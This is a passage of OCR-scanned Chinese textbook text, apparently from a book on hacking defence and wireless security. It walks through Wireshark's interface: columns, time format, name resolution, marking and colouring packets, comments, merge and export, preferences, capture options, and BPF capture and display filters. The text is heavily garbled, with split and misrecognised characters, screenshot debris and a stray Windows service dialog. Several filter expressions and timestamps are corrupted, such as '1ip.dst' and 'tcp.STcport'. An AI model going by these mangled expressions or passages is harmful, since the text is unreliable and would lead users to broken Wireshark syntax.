125 BA4:12:41.711347375 Guangdon_dB:ec:9.. 862.11 28 Control frame Acknowledgement, V Source 
26 日 2 149 849 G 28 Control frame 


Guangdon_d8;ec:9,,, 802 


step 图 用 户 还 可 以 删除 、 隐 藏 当 前 列 ， 在 显示 列 标 题 中 右 击 ， 
在 弹出 的 菜单 中 可 以 通过 选择 相应 的 菜单 命令 ， 


列 ， 如 右 图 所 示 。 


Acknowledgement, 
V Destination 


V Protocol 
来 删 除 或 隐藏 v| Length 

V Type 

V Info 

”删除 此 列 


用 户 可 以 对 当前 列 信 息 进行 修改 ， 在 显示 列 标题 中 右 击 ， 在 弹出 的 快捷 菜单 中 选择 


“编辑 列 ” 菜 单 命令 ， 


标题 : Time 
No. Time 


类 型 :Time (iormat as specified) ~ 


7 Destination Protocol 


4. 修改 显示 时 间 


默认 情况 下 ，Wireshark 给 出 的 时 间 信 
因 不 方便 阅读 ， 为 此 ，Wireshark 提 供 了 多 
种 时 间 显 示 方 式 ， 用 户 可 以 根据 个 人 言 好 
进行 选择 。 具 体操 作 步 又 如 下 : 
[step 图 单 去 “视图 ”菜单 ， 在 弹出 的 菜单 中 
选择 “时 间 显 示 格 式 ” 菜 单 命 令 ， 如 下 图 
所 示 。 


时 旧 显 示 格 式 (0) ;> 
解析 名 称 
缩放 (2) 


这 样 就 可 以 将 默认 时 间 信 息 以 时 间 格 
式 显 示 出 来 。 下 图 为 修改 后 的 时 间 ， 这 样 
更 加 符合 阅读 习惯 。 


Time 

2018-10-10 04:12:41.541339119 
2018-10-10 04:12:41.543900096 
2018-10-10 04:12:41.560918794 
2018-10-10 04:12:41.578031296 


5. 名 字 解 析 


默认 情况 下 ，Wireshark 只 开启 了 MAC 
地 址 解析 ， 针 对 不 同 三 商 的 MAC 头 部 信息 
进行 解析 ， 以 方便 阅读 ， 如 果 在 实际 中 有 
需要 可 以 开启 解析 网 络 名 称 、 解 析 传 输 层 
名 称 。 上 有 具体 的 操作 步骤 如 下 : 
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字段 : |Enter a field .. 发 生 : 
Length 


即 可 进入 列 信息 编辑 模式 ， 这 时 可 以 对 当前 列 信息 进行 修改 。 


© Cancel voK | 


Type Info 


step 加 单 击 “捕获 ”菜单 ， 在 弹出 的 菜单 
列表 中 选择 “选项 ”菜单 命令 ， 如 下 图 
所 示 。 


图 选项 (O)... Ctrl+K 
通 开始 (S) Ctrl+E 
图 

捕获 过 滤器 (F).. 

刷新 接口 列表 F5 


在 打开 的 设置 界面 中 选择 “选项 ” 选 
项 卡 ， 如 下 图 所 示 。 从 这 里 色 选 相应 的 选 
项 解析 名 称 即 可 。 


输入 输出 选项 
显示 选项 

v 实时 更 新 分 组 列表 
v 实时 捕获 时 自动 滚屏 


解析 名 称 


Vv| MAC 地 址 解析 
解析 网 络 名 称 
解析 传输 层 名 称 


用 户 还 可 以 手动 修改 对 地 址 的 解析 ， 
右 击 需要 解析 的 地 址 段 ， 在 弹出 的 菜单 中 
选择 “编辑 解析 的 名 称 ” 菜 单 命令 ， 如 下 
图 所 示 。 


标记 /取消 标记 分 组 (M) 
忽略 /取消 忽略 分 组 (|) 
设置 /取消 设置 时 间 参 考 
时 |e] 平 移 .. 

分 组 注释 . 

编辑 解析 的 名 称 


Wireshark 会 给 出 地 址 解析 库存 放 的 位 
置 ， 然 后 单 击 “统计 ”菜单 项 ， 在 弹出 的 
菜单 中 选择 “已 解析 的 地 址 ”菜单 命令 ， 
如 下 图 所 示 。 
捕获 文件 属性 
已 解析 的 地 址 
协议 分 级 (P) 
对 话 

分 组 长 度 

I/O 图 表 (!) 


[step 园 打开 下 图 所 示 的 对 话 框 ， 里 面 存 放 
了 已 经 解析 的 地 址 信息 。 通 过 对 名 称 的 解 
析 ， 对 于 数据 包 的 来 源 去 处 会 更 加 清晰 明 
了 ， 所 以 名 称 解 析 是 一 个 非常 好 的 功能 。 


Wireshark . 解析 后 的 地 址 . jtmpjwireshark_any_20181010054212_7Ln58a,pcapng @ 


Ctrl+Alt+Shift+C 


# 在 /tmpywireshark_any_26181916954212_7Ln58a.pcapng 中 找到 的 解析 后 的 地 址 = 


# 注释 
## 
# MO entries. 


# Hosts 
二 
# 167 entries,. 


220.181.111.188 www.a.shifen.com 
1.166.234.31 x2.Lcdn 2 


118.189.31.42 ”pl.tcdn.qq.conm 
1 


显示 ~ SCancel || vOK | 


侈 注意 : 如 果 开 启 名 称 解 析 可 能 会 对 性 
能 带 来 损耗 ， 同 时 地 址 解析 不 能 保证 全 
部 正确 ， 如 果 数 据 流 比较 大 建议 不 开启 名 
称 解 析 ， 在 对 抓 取 的 数据 包 处 理 时 再 进行 
解析 。 


7.2.2 数据 包 操作 


数据 包 操 作 是 Wireshark 的 主要 功能 ， 
获取 数据 包 后 ， 用 户 可 以 对 数据 包 进 行 标 
记 、 注 释 、 人 合并、 打印 以 及 导出 等 操作 。 

1. 标记 数据 包 

标记 数据 包 可 以 实现 对 比较 重要 的 数 
据 包 进行 标记 ， 同 时 还 可 以 修改 数据 包 显 
示 颜 色 。 标 记 数 据 包 的 操作 步骤 如 下 : 
在 需要 进行 标记 的 数据 包 上 ， 右 击 ， 
在 弹出 的 菜单 中 选择 “标记 /取消 标记 分 
组 ”菜单 命令 ， 如 下 图 所 示 。 
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标 1C/ 取 消 标 ic 分 组 (M) 
忽略 /取消 忽略 分 组 (|) 
设置 /取消 设置 时 间 参 考 
时 间 平 移 .. 

分 组 注释 . 


pare 
下 图 所 示 。 


INo. Tin ime e01 Sourc eaddress 


Destination 要 ‘Prot | 
16.，2018-1BD-16 gg6:;19;31,946537324 和 生生 166 .68 .46 .184 TCP 
16.、2618-16-146 66:149:31.947899918 B6:60:5e:996:6.. 166.68.46.184 TCP 


16.. 2018-19-196 956:19:3B8.979799916 
和 2016- 19- 19 96; 19; 31, 和 


pp 1a:aa:9g92:a5:26:05 
De 人 


892 .1 


TE EE TEE PE CEP 
74:70d:24:;26;68,,, 32;10;40:;b9:;a2:;83 


16.. 2918-19-198 95:19: 32， 541625742 
788 2618-196-16 66:;19:;65 .9B5179579 


2. 修改 颜色 


为 了 区 分 不 同 的 数据 包 ，Wireshark 提 
供 了 对 数据 包 进 行 区 分 颜色 的 设置 ， 有 具体 
angel 
[steep 国 在 数据 包 上 右 击 ， 在 弹出 的 快捷 菜单 
a ， 如 下 图 所 
示 ， 即 可 完成 对 数据 包 着 色 的 操作 ， 这 个 
操作 只 针对 此 次 抓 包 有 效 。 


作为 过 滤器 应 用 
准备 过 滤器 
对 话 过 滤器 
对 话 着 色 
如 果 想 要 给 数据 包 添 加 永久 性 的 着 色 
效果 ， 用 户 可 以 单 击 “视图 ”菜单 ， 在 弹 
出 的 菜单 列表 中 选择 “着 色 规 则 ”菜单 命 
令 ， 如 下 图 所 示 。 
看 着 色 分 组 列表 


着 色 规 则 (C).. 
对 话 着 色 


[se 图 打开 下 图 所 示 的 对 话 框 ， 在 其 中 修改 


iii 从 这 里 修改 的 颜色 规则 将 
会 永久 保存 。 


Wireshark . Coloring Rules Default xj 


bebe bdo edd 


v MB 
HTTP 


smb || nbss || nbns || nbipx || ipxsap || netbios 
http || tcp.port == 80 || http2 


驳 十 输 姆 ， 净 圾 大 动 。 规 则 共 居 序 进 行 处 理 ， 瑟 到 奢 到 一 个 F 屋 的 
+|[=-|[® 


园 Help Export... Import... © Cance 
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二 黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


站 提示 : 默认 情况 下 ，Wireshark 提 供 的 颜 


色 规 则 可 以 满足 用 户 的 需求 ， 如 果 不 是 特 


殊 需 要 不 建议 永久 修改 数据 包 的 颜色 。 


3. 修改 列表 项 颜色 


具体 的 操作 步骤 如 下 : 
双击 需要 修改 的 列表 项 ， 下 方 会 出 
现 “ 前 景 ” 和 “背景 ”两 个 按钮 ， 如 下 图 


Wireshark . Coloring Rules Default [x 


v SMB smb || nbss || nbns || nbipx || ipxsap || netbios 
v HTTP http || tcp.port == 80 || http2 


4 
又 十 护 弹 。 抱 六 作 被 。 规 则 艾 自 房 进行 让 囊 ， 直 到 挫 列 一 个 攻取 和 
+||-||m|| 前 孙 | | 背景 | Apply as filter 


园 Help Export... Impert- 


单 击 “ 前 景 ” 或 “背景 ”按钮 ， 会 弹 
出 “选择 颜色 ”对 话 框 ，Wireshark 提 供 了 
丰富 的 颜色 。 当 然 如 果 有 需要 还 可 以 自 定 
义 颜 和 色 ， 如 下 图 所 示 。 


© Cancel | v OK | 


4. 添加 注释 


Wireshark 提 供 对 数据 包 注 释 的 功能 ， 
在 实际 操作 中 如 果 感 觉 这 个 数据 包 有 问题 
或 者 比较 重要 ， 可 以 添加 一 段 注 释 信 息 ， 
具体 操作 步骤 如 下 : 
右 击 需要 添加 注释 信息 的 数据 包 ， 在 
弹出 的 快捷 菜单 中 选择 “分 组 注释 ”菜单 
命令 ， 如 下 图 所 示 。 


标记 /取消 标记 分 组 (M) 
忽略 /取消 忽略 分 组 (I) 
设置 /取消 设置 时 间 参 考 
时 间 平 移 .. 

分 组 注释 .. 
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step 贺 这 时 会 弹出 下 图 所 示 的 对 话 框 ， 在 其 
中 输入 相应 的 注释 。 添 加 注释 信息 后 下 方 
的 解读 列表 也 会 出 现 这 段 注 释 信 息 ， 以 方 
便 用 户 查看 。 


Wireshark , Packet5 Comment ©@ 


园 Help © Cancel v OK 


5. 合并 数据 包 


在 实际 抓 包 过 程 中 ， 如 果 网 络 流量 比 
较 大 ， 不 停止 抓 包 操作 ， 可 能 会 出 现 抓 包 
工具 消耗 掉 所 有 内 存 ， 最 终 导 致 系统 崩 演 
的 状态 。 为 解决 这 个 问题 ， 用 户 可 以 采取 
分 段 抓 取 ， 生 成 多 个 数据 包 文件 ， 最 后 为 
了 整体 分 析 ， 再 将 这 些 分 段 数 据 包 合并 成 
一 个 包 。 合 并 数据 包 的 操作 步骤 如 下 : 
选择 “文件 ”菜单 项 ， 在 弹出 的 菜 
单列 表 中 选择 “合并 ”菜单 命令 ， 如 下 图 
所 示 。 


打开 Ctrl+O 
打开 最 近 

合并 (M)... 

从 Hex 转 储 导 入 (1)... 

关闭 Ctrl+W 


打开 “合并 捕获 文件 ”对 话 框 ， 在 其 
中 选择 需要 合并 的 文件 ， 即 可 完成 合并 数 
据 包 的 操作 ， 如 下 图 所 示 。 


Wireshark .合并 捕获 文件 多 
查看 : 图 /root/Downloads ”| 中 全 年 3 | 三 
国 计算 机 名 称 “| 大 小 类 型 
root #1 mount-shared-folders.sh 291 字 节 sh File 


130 字 节 sh File 
1.02 MiB pcap.…Filk 
上 


文人 名称 N :| | 


# restart-vm-tools.sh 
个 tcp.pczapng 


@ Cancel 
文件 类 趣 : All Files BHelp 
前 道 分 组 
。 按时 间 玲 合并 
追加 分 组 
读 取 过 滤器 : Apply aread filter .. 


6. 打印 数据 包 


Wireshark 提 供 了 数据 包 打 印 功能 ， 可 
以 将 比较 重要 的 数据 包 进 行 打印 。 打 印 数 
据 包 的 操作 步骤 如 下 : 
选择 “文件 ”菜单 项 ， 在 弹出 的 菜 
单列 表 中 选择 “打印 ”菜单 命令 ， 如 下 图 
所 示 。 


导出 SSL 会 话 密 钥 .… 

导出 对 象 

打印 (P)... Ctrl+P 
退出 Ctrl+Q 


弹出 “打印 ”对 话 框 ， 在 该 对 话 框 中 
会 显示 此 次 打印 数据 包 的 一 些 信息 ， 包 括 
缩 略图 、 概 要 等 ， 如 下 图 所 示 。 

Remote procedure Call(RpC) 的 属性 (本 lEii 和 和 XxX 
常规 ”登录 恢复 。 依存 关系 


某 些 服务 依 床 于 其 他 服务 、 系 统 驱 动 程序 或 加 载 上 序 组 。 如 果 鞭 个 系统 组 件 被 停 
止 或 运行 不 正常 ， 依 训 于 它 的 服务 会 受到 影响 ， 


Remote Procedure Call (RPC) 


此 服务 依 藉以 下 竺 统 组 件 (T); 


以 下 系统 组 件 依 融 此 服务 (月 ; 

| # 六 ActiveX Installer (AxlnstSV) 人 
9 Application Identity 

6 Application Information 

起 AppX Deployment Service (AppXSVO) 

过 ,Background Intelligent Transfer Service 

i Background Tasks Infrastructure Service 

i Base Filtering Engine Y 


i 2 i i 


7. 导出 数据 包 


Wireshark 提 供 了 数据 包 导 出 功能 ， 用 
户 可 以 进行 粒 选 导出 ， 还 可 以 通过 分 类 导 
出 ， 还 可 以 只 导出 选中 数据 包 。 导 出 数据 
包 的 操作 步骤 如 下 : 
[sep 回 选择 “文件 ”菜单 项 ， 在 弹出 的 菜单 
列表 中 选择 “导出 特定 分 组 ”菜单 命令 ， 
如 下 图 所 示 。 
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导出 特定 分 组 ... 

导出 分 组 解析 结果 

导出 分 组 字 节 流 (B).. Ctrl+Shift+X 
导出 PDU 到 文件 .. 

导出 SSL 会 话 密 钥 ... 

导出 对 象 


弹出 “导出 特定 分 组 ”对 话 框 ， 在 其 
中 可 以 选择 导出 数据 包 的 名 字 ， 并 设置 导 
出 范围 是 所 有 分 组 还 是 仅 选 中 分 组 ， 如 下 
图 所 示 。 


Wireshark. 导出 特定 分 组 © 
查看 : 冯 /root/Downloads "| > 个 福 3 引 | 三 
国 计算 机 名称 ”大 小 类 型 日 期 被 修 
me ioek ® tcp.pcapng 1.02 MiB pcap..File 2018/1.-| 
| 口 ， 
文件 名 称 (N) : 
© Cancel 
导出 为 ; Wiresharkl... - pcapng ”| Help 
分 组 范围 用 gzip 压缩 (Z| 
已 丘 获 '® 已 显示 
。 所 有 分 组 (A) 33 二 
仅 选 中 分 组 (S) 1 
荡 围 [R): 0 


如 果 选 择 “ 导 出 分 组 解析 结果 ”菜单 
命令 ， 可 以 将 数据 包 导 出 不 同 的 格式 ， 如 
下 图 所 示 。 如 可 以 是 使 用 Excel 查 看 的 CSV 
格式 、 使 用 记事 本 查看 的 纯 文 本 格式 ， 还 
可 以 将 数据 包 导 出 为 C 语 言 数组 、XML 数 
据 、JSON 数 据 等 格式 。 


“为 纯 文本 中 
为 CSV.. 
为 C 语言 数组 .。 


为 PSML XML... 
为 PDML XML.. 
为 JSON.. 


7.2.3 ”首选 项 设置 


大 多 数 软件 都 会 提供 一 个 首选 项 设 训 有 让 
置 ， 该 设置 主要 用 于 配制 软件 的 整体 风 
格 ，Wireshark 也 提供 了 首选 项 设置 。 进 行 
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二 黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


首选 项 设置 的 操作 步骤 如 下 : 

选择 “编辑 ”菜单 项 ， 在 弹出 的 菜单 
列表 中 选择 “首选 项 ”菜单 命令 ， 如 下 图 
所 示 。 


分 组 注释 .…. Ctrl+Alt+C 
Delete All Packet Comments 

配置 文件 .… Ctrl+Shift+A 
首选 项 (P)... Ctrl+Shift+P 


打开 “首选 项 ”对 话 框 ， 如 下 图 所 
示 。 首 次 打开 “首选 项 ”对 话 框 后 ， 在 默 
认 打 开 的 界面 中 ， 用 户 可 以 进行 相关 选项 
的 设置 。 


Wireshark . 首选 项 [x) 
Er V 记 住 主 而 吕 的 大 小 及 位 置 
Font and Colors 打开 文件 夹 中 的 文件 
Layout ， 
Capture 。 最近 使 用 的 文件 实 
四 该 文件 史 : 浏览 . 
Filter Buttons 
Name Resolution 显示 最 多 
* Protocols 10 “ 过 小 器 项 目 
» Statistics 
Advanced 10 ”个 最 近 文 件 


Y 确认 未 保存 的 捕获 文件 
主 工具 栏 样式 : 只 有 图 标 
语言 使 用 系统 设置 ” 


SCancel |[_ ZoK | 

“前 选项 ”对 话 框 中 相关 参数 的 介绍 

如 下 : 

e “ 记 住 主 窗口 的 大 小 及 位 置 ” 复 选 
框 : 选中 之 后 ， 每 次 打开 都 将 是 固 
定 大 小 。 

e “打开 文件 夹 中 的 文件 ”: 设置 默 
认 打 开 或 保存 文件 的 路 径 ， 如 果 经 
常 抓 取 数 据 包 ， 建 议 设置 一 个 固定 
的 位 置 。 

e “显示 最 多 ”: 显示 数据 包 条 目 ， 
根据 实际 需要 进行 设置 即 可 。 

e “确认 未 保存 的 捕获 文件 ” 复 选 
框 : 选中 之 后 ， 没 有 保存 的 文件 名 
前 面 会 多 出 一 个 “*” 号 ， 提 示 用 户 
没有 保存 ， 一 般 建 议 开 局。 

e “ 主 工 具 栏 的 样式 ”: 这 里 有 三 种 样 

式 供 选择 ， 即 只 有 图 标 、 只 有 文本 、 
图 标 加 文本 ， 根 据 需 要 选择 即 可 。 


“语言 ”: 设置 语言 环境 ， 这 里 可 


回 Hetp 
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以 选择 多 种 国家 语言 ， 如 果 英 文 较 
好 可 以 切换 成 英文 状态 。 
在 “首选 项 ”对 话 框 中 ， 选 择 
Columns 项 ， 然 后 单 击 左下 方 的 “+” 按 钮 
可 以 添加 一 个 列 ， 单 击 “-” 按 钮 可 以 删除 
一 个 列 ， 如 下 图 所 示 。 


已 显示 标题 类 型 字段 字段 发 生 
No. Number 
v Time0l Time (format as specified) 
vV Source address Custom WwWlan.sa 0 


Vv Destination Destination address 
V Protocol Protocol 

v Length packet length (bytes) 
v Info Information 


二 一 


选择 Font and Colors 项 ， 在 打开 界面 

中 可 以 设置 软件 字体 大 小 以 及 默认 颜色 ， 

如 下 图 所 示 。 

主 窗口 字体 : Liberation Mono 11.0 

Lazy badgers move unique waxy jellyfish packets 0123456789 

颜色 : 

四 由 标记 的 分 组 

国生 | | 忽略 的 分 组 

加 加 FE “追踪 数据 流 ” 客 户 端 示例 文本 

| [ 9] “追踪 数 气流” 服务 器 示例 文本 
AR 
Samplewaningfilter | 


选择 Layout 项 ， 在 打开 的 界面 中 可 
以 设置 软件 显示 布局 ， 该 项 还 是 比较 重要 
的 ， 默 认 情 况 下 ， 软 件 选 择 的 是 分 3 横 显 
示 ， 根 据 个 人 喜好 可 以 选择 不 同 的 布局 方 
式 进 行星 示 ， 如 下 图 所 示 。 


窗 格 1: 窗 格 2: 窗 格 2: 

”分 组 列表 分 组 列表 分 组 列表 
分 组 详情 e 分 组 详情 分 组 详情 
分 组 子 节 流 分 组 子 书 流 e) 分 组 子 忆 流 
无 无 无 


Packet List settings: 

Show packet Separator 
状态 栏 设置 : 

Show selected packet number 


显示 文件 加 载 时 间 ] 


Restore Defaulis 


7.2.4 捕获 选项 


捕获 选项 主要 针对 抓 取 数据 包 使 用 的 
网 卡 、 抓 包 前 的 过 滤 、 抓 包 大 小 、 抓 包 时 
长 等 进行 设置 。 这 个 功能 在 抓 包 软件 中 也 
属于 非常 重要 的 一 个 设置 。 

1. 进行 捕获 选项 设置 

进行 捕获 选项 设置 的 操作 步骤 如 下 : 
选择 “捕获 ”菜单 项 ， 在 弹出 的 菜 


单列 表 中 选择 “选项 ”菜单 命令 ， 如 下 图 
所 示 。 


加 选项 (0).. Ctrl+K 
道 开始 (S) Ctrl+E 
较 

捕获 过 滤器 (F)... 

刷新 接口 列表 FS 


打开 “捕获 接口 ”对 话 框 ， 默 认 选 中 

“输入 ”选项 卡 ， 其 中 混杂 模式 为 选中 状 
态 ， 该 项 需要 选中 否则 可 能 抓 取 不 到 数据 
包 ， 列 表 中 列 出 网 卡 相 关 人 信息， 选择 相应 
的 网 卡 可 以 抓 取 数据 包 ， 如 下 图 所 示 。 


Wireshark .捕获 接口 © 


流量 屋 Snap 
ethO 里 访 
any = inWX cook 
= hernet 
wlan emmet 
nflog = Linux netfilter log messages 是 认 
nfqueue ~ Raw 1PVd4 昧 认 
usbmoni = Unknown 了 默认 
usbmon2 = Unknown 黑 认 
Cisco remote cap ciscodump Unknown 
andom pe tor; randpkt nknown 
SSH remote capture: ssh dump Unknown 
DP Listen Tm apture- udpdump Unknown 
上 
V 在 所 有 毛 口 上 便 几 汇 杂 模式 管 考 投 口 - 
所 选择 接口 的 搬 获 过 沱 堪 : | 出 |Entera capture fitte * 绾 ia6PFs 
加 Hep x Close 开始 | 


在 “捕获 接口 ”对 话 框 中 ， 选 择 “ 输 
出 ”选项 卡 ， 在 其 中 可 以 设置 文件 保存 的 
路 径 、 输 出 格式 、 是 否 自 动 创建 新 文件 
等 ， 如 下 图 所 示 。 


摘 获 到 永久 文件 
文件 ; 001 浏览 


粮 出 格式 : 9 pcapng pcap 
Y 自动 创建 新 文件 ， 经 过 . 


-| | 兆 字 节 > 
1 -| | 秒 


使 用 一 个 环形 缓冲 器 , 采用 |2 = | 文件 


默认 “上 自动 创建 新 文件 ” 复 选 框 未 被 
选中 ， 选 中 后 可 以 指定 保存 规则 ， 有 3 种 规 
则 可 供 选择 。 


加] 


可 以 调整 。 Ei 

(2) 根据 时 间 长 度 判断 ， 达 到 规定 时 
间 保 存 更 换 下 一 个 文件 。 例 如 ， 每 间隔 1 
分 钟 存储 一 个 文件 。 

(3) 循环 模式 ， 只 是 用 两 个 数据 包 ， 

初始 时 会 创建 两 个 数据 包 ， 当 需要 第 三 
数据 包 时 不 创建 而 蔡 换 第 一 个 数据 包 ， 
依次 循环 。 
[sep 贺 在 “捕获 接口 ”对 话 框 中 ， 选 择 “ 选 
项 ”选项 卡 ， 在 其 中 可 以 设置 显示 选项 、 
解析 名 称 、 自 动 停止 捕获 等 参数 ， 如 下 图 
所 示 。 


显示 选项 解析 名 称 
v 实时 更 新 分 组 列表 vv MAC 地 址 解析 
v 实时 捕获 时 自动 滚屏 解析 网 络 名 称 
解析 传输 层 名 称 


自动 停止 捕获 ， 在 经 过 .… 


1 “| 分 组 
1 “| 文件 
1 秒 


人 疙 提示 : 这 里 的 自动 停止 捕获 规则 ， 相 当 
于 一 个 定时 器 的 作用 ， 当 符合 条 件 后 停止 
抓 色 ， 可 以 同 多 文件 保存 功能 配合 使 用 。 
例如 : 设置 每 1MB 保 存 一 个 数据 包 ， 符 合 
10 个 文件 后 停止 抓 包 。 


2. 数据 包 的 过 滤 设 置 


Wireshark 抓 包 过 滤 是 基于 libpcap/ 
Winpcap 库 实现 的 ， 所 以 亲人 循 BPF (Berke- 
ley Packet Filter) 语法 ， 其 中 包括 类 型 

(Type)、 方 同 (Dir) 、 协 议 (Proto) 、 
逻辑 运算 符 。 

e@ 类 型 : host、net、port。 

@ 方 同 : src、dst。 

e@ 协议 : ether、ip、tcp、udp、http、 

ftp 等 。 
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e 逻辑 运算 符 ，&& 与 、|| 或 、! 非 。 

例如 : 想 要 抓 取 源 地 址 位 192.168.0.100 
目的 地 端口 为 80 的 流量 ， 过 滤 语 句 为 : 
(src host 192.168.0.100 && dst port 
80) ; 想 要 抓 取 IP 地 址 192.168.0.100 和 
192.168.0.101 的 流量 ， 过 滤 语 句 为 : (host 
192.168.0.100 || host 192.168.0.101) ; 想 
要 抓 取 除 广播 外 的 所 有 包 ， 过 滤 语 句 为 : 


(! broadcast) 。 


3. 开始 捕获 数据 包 


(1) 过 滤 MAC 地 址 。 过 滤 的 语法 格 
式 为 : 
ether host < 需要 过 滤 的 MAC 地 址 > 


ether src host <MAC 地 址 > 
ether dst host <MAC 地 址 > 


例如 : 对 MAC 地 址 过 滤 ， 可 以 在 “所 
选择 接口 的 捕获 过 滤器 ”文本 框 中 输入 如 
下 图 所 示 的 语句 。 


v 在 所 有 接口 上 使 用 混杂 模式 
所 选择 接口 的 捕获 过 滤器 - 册 |ethersref4:83cd33603 加 


(人 多 提示: 如 果 过 滤 字 段 输入 错误 ， 则 背景 
色 是 红色 ， 输 入 正确 则 是 绿色 。 
(2) 过 滤 IP 地 址 。 过 滤 的 语法 格式 为 : 


host < 需 过 滤 的 IP 地 址 > 
src host <IP 地 址 > 
dst host <IP 地 址 > 


例如 : 对 IP 地 址 过 滤 ， 可 以 在 “所 选 
择 接 口 的 捕获 过 滤器 ”文本 框 中 输入 下 图 
所 示 的 语句 。 


V 在 所 有 接口 上 使 用 混杂 模式 
所 选择 接口 的 拉 获 过 滤器 : 月 srchost192168000 四 - 


(3) 过 滤 闯 口 。 过 滤 的 语法 格式 为 : 


prot 80、 1 proE e0 dst port 80. sre 
port 80 


过 滤 协 议 为 : arp、icmp、http。 

例如 : 综合 过 滤 地 址 与 端口 ， 可 以 在 
“所 选择 接口 的 捕获 过 滤器 ”文本 框 中 输 
入 下 图 所 示 的 语句 。 
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v | 在 所 有 接口 上 使 用 混杂 楼 式 
所 选择 接口 的 捕获 过 波 器 : | 由 |host 192.168.0.100 && port 8080 


税 提 示 : 抓 包 过 滤 一 旦 设置 后 将 只 抓 取 符 
合 规则 的 数据 包 ， 这 样 会 过 滤 掉 大 量 干扰 


数据 包 ， 从 而 提高 抓 包 数据 的 准确 率 。 


4. 过 滤 数 据 包 

显示 过 小 右 与 抓 包 过 小 类 似 ， 显 示 过 
滤器 是 在 已 经 抓 取 的 数据 包 中 过 滤 ， 显 示 
出 需要 的 数据 包 ， 在 快捷 方式 的 下 方 有 一 
个 可 以 输入 表达 式 的 地 方 ， 如 下 图 所 示 。 
在 这 里 输入 相应 的 表达 式 即 可 过 滤 。 


站 本 芝 商 各 同 局 QQeeleelaaaqa 
Avply yla ker .< 


显示 过 滤 的 语法 设置 规则 如 下 : 

。 比较 操作 符 : =- 等 于 、! = 不 等 
于 、> 大 于 、< 小 于 、>= 大 于 等 于 、 
<= 小 于 等 于 。 

e 逻辑 操作 : and 与 操作 、or 或 操作 、 
xor 异 或 操作 、not 非 操作 。 

e IP 地址 : ip.addr、ip.src、ip.dst。 

e 过滤 靖 口 : tcp.port、 tcp.srcport、 
tcp.dstport、 tcp.flat.syn、 tcp.flag. 


品 | 


ack。 
e 过 滤 协 议 : arp、ip、icmp、upd、 
tcp、bootp、dns 等 。 
例如 : 想 要 过 滤 满 足以 下 条 件 的 数据 
其 中 ，IP 地 址 如 下 设置 : 
Ip.addr == 192.168.1.1 
ip.src == 192.168.1.1 
1ip.dst == 192.168.1.1 
1p.src == 192.168.1.100 and 1p.dst == 
58.106.127.80 
端口 如 下 设置 : 
tcp.port = 80 


pe 


tcp.STcport == 80 
tcp.dstport == 80 
tcp.flag.syn == 1 
过 滤 协 议 如 下 : 


arpa ep UD noOE DED Do arp 


下 面 给 出 一 个 综合 过 滤 的 语句 ， 其 中 
第 选 了 IP 地 址 为 192.0.2.1 并 且 不 是 从 tcp 协 
议 80、25 端 口 发 出 的 包 。 下 图 为 输入 的 表 
达 式 。 

A 图 


ip.addr == 


问题 ,什么 情况 使 用 抓 包 过 滤 ? 什么 
情况 使 用 显示 过 滤 ? 

如 果实 际 网 络 数据 流量 比较 大 ， 并 
且 已 经 锁定 数据 包 类 型 可 以 使 用 抓 包 过 渡 
峰 。 一 般 如 果 没 有 特殊 需求 建议 使 用 整体 
抓 包 ， 然 后 再 进行 显示 过 滤 ， 保 证 一 个 真 
实 的 网 络 环境 ， 根 据 需 要 再 进行 科 分 ， 这 
样 分 析 数 据 包 效果 会 更 好 。 


局 级 操作 


高 级 操作 是 将 捕获 的 数据 包 以 更 直观 
的 形式 展现 出 来 ， 学 会 如 何 使 用 这 些 高 级 
技能 ， 对 于 以 后 的 数据 包 处 理会 更 加 得 心 
应 手 。 


7.3.1 分 析 数 据 包 


分 析 数 据 包 主 要 包括 数据 追踪 与 专家 
信息 两 方面 内 容 ， 它 们 都 属于 “分 析 ” 沫 
单 下 的 功能 。 


1. 数据 追踪 


正常 通信 中 如 TCP、UDP、SSL 等 数 
据 包 都 是 以 分 片 的 形 发 送 的 ， 如 果 在 整个 
数据 包 中 分 片 查 看 数据 包 不 便于 分 析 ， 使 
用 数据 流 追 踪 可 以 将 TCP、UDP、SSL 等 
数据 流 进 行 重 组 ， 以 一 个 完整 的 形式 呈现 
出 来 。 

打开 追踪 流 有 两 种 方式 : 

第 1 种 方式 : 在 数据 流 显 示 列 表 中 ， 选 
择 需 要 追踪 的 数据 流 ， 右 击 ， 在 弹出 的 快 
捷 菜 单 中 选择 “追踪 流 ” 沫 单 命 令 ， 如 下 
图 所 示 。 


© Oa 


192.0.2.1 and not tcp.port in {80 25 


Pk 


第 7 章 无线 网 络 的 安全 分 析 工 具 一 一 


SCTP 
追踪 流 
复制 | 


第 2 种 方式 : 选择 “分 析 ” 沫 单 ， 在 
弹出 的 菜单 列表 中 选择 “追踪 流 ” 菜 单 命 
令 ， 如 下 图 所 示 。 


重新 载 入 Lua 插件 
SCTP 
追踪 流 


以 上 两 种 方式 都 可 以 打开 “追踪 流 ” 界 
面 ， 如 下 图 所 示 。 从 这 里 可 以 清晰 地 看 到 这 
个 协议 通信 的 完整 过 程 ， 其 中 发 送 请 求 会 以 


显示 ， 服 务 右 人 返回 会 显示 为 赣 色 
红色 显示 ， 会 显示 
Wireshark , 人 记 踪 TCP 流 (tcp.stream eq 0). tcp.pcapng ©OQ@0 
GET /suc .tx . le — 
Ho de i ctpor nla 
Use ns /5， 8 (xad; a x86_64; rv:60.0) Geckov26166161 Firefox/60.0 
Acc 
Accep an nguage: en-US,en; 呈 6.5 
cept - i "9: 和 2 flate 
总 he 区 
Pragma: no-c 
Connection: 和 alive 
HTTP/1.1 2996 OK 
Content-Type: text/pl 
content-Length: 8 
Last-Modifi ed: Mon, 15 May 2817 18:84:40 GMT 
ETag: ' let e1444eb?d28906123" 
ACC pt- anges: byte 
Server; AmazoDn 
X-Amz-Cf-Id: lu Re a 人 We Df pe OHZXShTNPt 1M8vqKqSA4aAASsA== 
Cache-Control: ust-revalidate 
Date: Thu, 11 oc t 2818 ， 61: 24 ‘em 
G ct keep-alive 
SUCCess 
GET ee EE 
de PE detectportal.fir 
r-Agent: Moz i /5. : 人 Linux x86 64; rv:69.9) Gecko/29199191 Firefox/690.9 二 
2 若 户 映 分 名 2 语 务 器 分 姐 3tumls)， 
Entire conversation (1,344 bytes) 显示 和 保存 数据 为 ASCII se lo 目 D 


筷 找 ; 
加 Help 滤 挤 此 流 打印 


2. 专家 信息 


专家 信息 可 以 对 数据 包 中 特定 状态 
进行 警告 说 明 ， 其 中 包括 错误 信息 〈er- 
rors) 、 警 告 信 息 (warnings) 、 注 意 信 息 
